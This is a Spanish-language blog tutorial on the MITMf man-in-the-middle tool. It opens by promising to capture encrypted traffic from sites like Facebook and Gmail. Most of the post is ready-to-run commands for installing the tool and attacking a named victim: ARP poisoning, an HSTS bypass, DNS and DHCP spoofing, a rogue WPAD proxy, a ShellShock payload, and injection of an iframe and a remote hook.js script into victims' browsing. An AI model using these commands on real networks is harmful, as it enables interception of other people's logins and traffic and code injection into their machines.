Bueno en esta entrada les voy a mostrar como capturar trafico de una red la cual viaja de modo encriptada por ejen}mplo paginas como facebook, gmail, outlook, etc... con la herramienta mitmf.
Lo primero que les voy a decir es que es mitmf y para que sirve:
MITMf tiene como objetivo proporcionar una ventanilla única para los ataques Man-in-the-Media y la red durante la actualización y la mejora de los ataques y técnicas existentes.
Originalmente construido para hacer frente a las deficiencias significativas de otras herramientas (por ejemplo Ettercap, Mallory), ha sido re-escrito casi completamente desde cero para proporcionar un marco modular y fácilmente extensible que cualquiera puede utilizar para implementar su propio ataque MITM. La forma de instalación es la siguiente:
- En Arch Linux:
pacman -S python2-setuptools libnetfilter_queue libpcap libjpeg-turbo capstone
- En Debian y derivados (ejm: Ubuntu, Kali Linux etc...)
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev
La forma de usarse es la siguiente:
pd: no es la unica forma pero es la más común :D
mitmf --hsts --arp --spoof --i wlan0 --target 192.168.x.x --gateway 192.168.x.x
* En target se pone la ip del objetivo (victima)
* En gateway se pone la ip de salida (router)
Otros ejemplos que da el autor en GITHUB
El uso más básico, inicia las SMB proxy HTTP, DNS, servidores HTTP y Net-Creds sobre interfaz enp3s0:
python mitmf.py -i enp3s0
ARP envenenar a toda la subred con la puerta de enlace 192.168.1.1 en el uso de la parodia plugin:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1
Igual que el anterior + un servidor proxy pícaro WPAD utilizando el respondedor plugin:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad
ARP veneno 192.168.1.16-45 y 192.168.0.1/24 con la puerta de entrada a 192.168.1.1:
python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1 / 24 --gateway 192.168.1.1
Habilitar la suplantación de DNS, mientras envenenamiento ARP (Dominios spoof se extraen del archivo de configuración):
python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1
Habilitar LLMNR / NBTNS / MDNS spoofing:
python mitmf.py -i enp3s0 --responder --wredir --nbtns
Habilitar DHCP spoofing (la piscina del IP y subred se extraen del archivo de configuración):
python mitmf.py -i enp3s0 --spoof --dhcp
Igual que el anterior, con una carga útil ShellShock que se ejecutará si cualquier cliente es vulnerable:
python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'eco 0wn3d'
Inyectar un IFrame HTML usando el Inyectar plugin:
python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com
Inyectar un script JS:
python mitmf.py -i enp3s0 --inject --js-url http: // carne de vacuno: 3000 / hook.js
A continuación les dejo un vídeo de como usarlo y de como instalarlo:
Bueno espero que les sea de gran utilidad esta información.
http://www.yottahack.net/wp-content/uploads/2015/06/mitmf.png
ResponderEliminarhola
ResponderEliminar